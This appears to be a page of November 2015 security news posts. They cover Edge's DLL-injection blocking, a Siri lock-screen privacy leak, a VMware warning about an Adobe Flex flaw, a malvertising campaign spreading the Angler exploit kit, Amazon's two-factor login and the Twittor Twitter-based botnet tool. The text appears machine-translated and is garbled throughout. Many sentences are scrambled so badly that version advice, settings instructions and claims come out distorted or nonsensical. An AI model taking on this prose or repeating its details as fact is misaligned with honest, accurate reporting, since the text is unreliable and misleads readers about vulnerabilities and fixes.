Browser hackers are a favorite target. If someone succeeds in an advertisement that the user sees, modify or add to it one, that person may earn a lot of money, Microsoft said. But hackers are increasingly using browser injections. The user notices this if, for example once a toolbar in the web browser has been added or if the browser home page surreptitiously changed.

Microsoft Edge that will not happen, writes Microsoft itself. The browser blocks unauthorized DLL injections, except as they are part of a Windows-based component, or in the case of a signed driver for a device. "Only DLLs that are labeled" Microsoft signed "have or Windows Hardware Quality Lab (WHQL) are signed, are allowed." According to Microsoft, the new enhancements make browsing with Windows faster, safer and more stable.

Friday, 20 November 2015

"Apple's Siri Personal Reveals"


Users with an iPhone or iPad who appreciate their privacy, the voice assistant Siri better off if they do not use it. Experts Trend Micro maintain that someone on an iPhone or iPad when Siri is activated within 30 seconds after the full name, email, phone number and profile picture may come. It does not matter whether the device is locked.

Data

Who has a phone in hand, with his voice can retrieve all kinds of information, such as name, contact information and even calendar appointments. By the command 'what is my name' to speak of, for example, Siri intones the full name of the owner.And so there are a number of assignments which Siri, even if the smartphone or tablet is blocked.

Privacy

It is, according to Trend Micro a weakness of Siri where users already longer complain on Internet forums. According to Trend Micro not only the privacy of the owner of the iPhone or iPad at stake, but also the contacts of that person.

Apple late in a response to the security company that Siri users can disable it on a locked screen. This can be done via the Settings menu and then using the "Touch ID & password 'option and then' Siri '. As the personal assistant can be switched off.

VMware Warns Of Vulnerability In Adobe Flex Software


VMware has warned of a vulnerability in a software module Adobe Flex used in a number of products including vCenter Server and vCloud Director. According to the report, the versions of VMware vCenter Server 5.5 and older vulnerable. Only version 6.0 of vCenter Server is not.

Upgrading

"You do not want unnecessary risks we advise you to upgrade to a higher version of our products," a spokesman of VMware reacts briefly. Users of vCloud Director 6.0 and Horizon are advised to upgrade to install VMware.

It is striking or the time of the alert. VMware Wednesday released a security advisory, while the problem certainly since august known is. Adobe has also been there at the time for warning.

An attacker can with a special XML command to the server to make sure that there are unintended data is disclosed.

Big Malware Advertising Campaign Unraveled


Malwarebytes claims to have exposed one of the largest advertising campaigns to malware of recent months. With the campaign large numbers of visitors were redirected to websites casino while their computers were infected with malware.

The campaign focused on visitors somewhat questionable websites including torrents, live streams of the latest movies and pirated software. Some ads that were on those sites, visitors automatically sent by (without having to click on the ad) to one of the casino sites.


Iframes

These sites were used as a diversion while there were loaded onto the background iframes variety of domains, which ultimately caused the Angler exploit kit to the victim was installed. Since this week would also Neutrino exploit kit can be used.

The ad campaign would be launched on October 21 and have lasted at least three weeks. That it took so long is, according Malwarebytes because both visitors and administrators of the dubious torrent sites had little need to report abuse, since they themselves were engaged in illegal content.

According SimilarWeb, a service that collects and analyzes data on website traffic, these ad networks generated in October visit more than two billion.

Thursday, 19 November 2015

Amazon Makes Two-Factor Authentication


Amazon has quietly for the shop two-factor authentication enabled. The option is currently still stand out. Logging in Amazon normally goes with a username and password. But for added security, users can now also receive a code on their phone they have to fill in the login.

The introduction of two-factor authentication will the attackers more difficult for someone else to log on because they need to know in this case, both username and password, but also have access to the smartphone.

An employee of Engadget discovered the new option this week. According to reports on Twitter, Amazon would be the new two-factor identification introduced about two weeks ago.

Two-factor authentication is a widely used method to prevent abuse of login data. Other major Internet companies that offer this login method, include Google, Twitter and Facebook.

Who at Amazon wants to use the two-factor authentication, should go to their account settings and select it by changing the settings for 'advanced settings'.

Botnet Tool Uses Twitter Direct Messages



Cyber criminals can control their botnet recently via Direct Messages on Twitter. The Python program Twittor called, was designed by the idea of GCAT, a similar program cyber criminals command & control servers to be managed via Gmail. Twittor made ​​by self-appointed security researcher Paul Amar and available from September, but is now observed by Sophos.

The tool uses direct messages on Twitter. The "advantage" of them, as compared to the conventional way of managing command & control servers, which the Direct Messages on Twitter are private. And the traffic is not stopped with IP filtering because Twittor use the Twitter API.

In addition, Twitter announced earlier this year that the limit of 140 characters is widened in private messages. This will therefore also more malicious traffic. The limitation is that there is a maximum of 1 000 direct messages per day can be sent.A botmaster can therefore no more than approximately 100 bots manage per account.

Many security tools such as Nmap and Metasploit, are not only useful for cyber criminals also useful for security researchers. Publishing a free tool that makes it possible to create a botnet via Twitter Direct Message operate seems an odd way of security research, says John Zorabedian Sophos.